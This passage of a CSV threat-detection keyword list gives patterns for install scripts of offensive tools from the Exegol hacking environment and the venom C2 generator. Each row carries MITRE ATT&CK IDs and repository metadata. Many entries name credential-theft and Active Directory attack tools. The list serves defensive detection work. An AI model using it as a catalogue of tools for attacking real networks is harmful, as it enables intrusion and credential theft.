tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound*",".{0,1000}install_bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound-import*",".{0,1000}install_bloodhound\-import.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound-py*",".{0,1000}install_bloodhound\-py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_bloodhound-quickwin*",".{0,1000}install_bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_certipy*",".{0,1000}install_certipy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_certsync*",".{0,1000}install_certsync.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_coercer*",".{0,1000}install_coercer.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_crackhound*",".{0,1000}install_crackhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_cracking_apt_tools*",".{0,1000}install_cracking_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_crackmapexec*",".{0,1000}install_crackmapexec.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_cypheroth*",".{0,1000}install_cypheroth.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_darkarmour*",".{0,1000}install_darkarmour.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_dfscoerce*",".{0,1000}install_dfscoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_donpapi*",".{0,1000}install_donpapi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_enum4linux-ng*",".{0,1000}install_enum4linux\-ng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_enyx*",".{0,1000}install_enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_evilwinrm*",".{0,1000}install_evilwinrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_finduncommonshares*",".{0,1000}install_finduncommonshares.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_gmsadumper*",".{0,1000}install_gmsadumper.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_goldencopy*",".{0,1000}install_goldencopy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_gosecretsdump*",".{0,1000}install_gosecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_gpp-decrypt*",".{0,1000}install_gpp\-decrypt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_hashonymize*",".{0,1000}install_hashonymize.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_impacket*",".{0,1000}install_impacket.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_keepwn*",".{0,1000}install_keepwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_kerbrute*",".{0,1000}install_kerbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_krbrelayx*",".{0,1000}install_krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ldapdomaindump*",".{0,1000}install_ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ldaprelayscan*",".{0,1000}install_ldaprelayscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ldapsearch-ad*",".{0,1000}install_ldapsearch\-ad.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_lnkup*",".{0,1000}install_lnkup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_lsassy*",".{0,1000}install_lsassy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_manspider*",".{0,1000}install_manspider.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_mitm6_pip*",".{0,1000}install_mitm6_pip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_noPac*",".{0,1000}install_noPac.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ntlmv1-multi*",".{0,1000}install_ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_oaburl*",".{0,1000}install_oaburl.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_PassTheCert*",".{0,1000}install_PassTheCert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pcredz*",".{0,1000}install_pcredz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_petitpotam*",".{0,1000}install_petitpotam.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pkinittools*",".{0,1000}install_pkinittools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_polenum*",".{0,1000}install_polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_privexchange*",".{0,1000}install_privexchange.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pth-tools*",".{0,1000}install_pth\-tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pygpoabuse*",".{0,1000}install_pygpoabuse.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pykek*",".{0,1000}install_pykek.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pylaps*",".{0,1000}install_pylaps.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pypykatz*",".{0,1000}install_pypykatz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pywhisker*",".{0,1000}install_pywhisker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_pywsus*",".{0,1000}install_pywsus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_responder*",".{0,1000}install_responder.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_roastinthemiddle*",".{0,1000}install_roastinthemiddle.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_ruler*",".{0,1000}install_ruler.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_rusthound*",".{0,1000}install_rusthound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_shadowcoerce*",".{0,1000}install_shadowcoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_smartbrute*",".{0,1000}install_smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_smbmap*",".{0,1000}install_smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_smtp-user-enum*",".{0,1000}install_smtp\-user\-enum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_sprayhound*",".{0,1000}install_sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_targetedKerberoast*",".{0,1000}install_targetedKerberoast.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_webclientservicescanner*",".{0,1000}install_webclientservicescanner.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_windapsearch-go*",".{0,1000}install_windapsearch\-go.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*install_winrar_wine32.exe*",".{0,1000}install_winrar_wine32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*install_winrar_wine64.*",".{0,1000}install_winrar_wine64\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 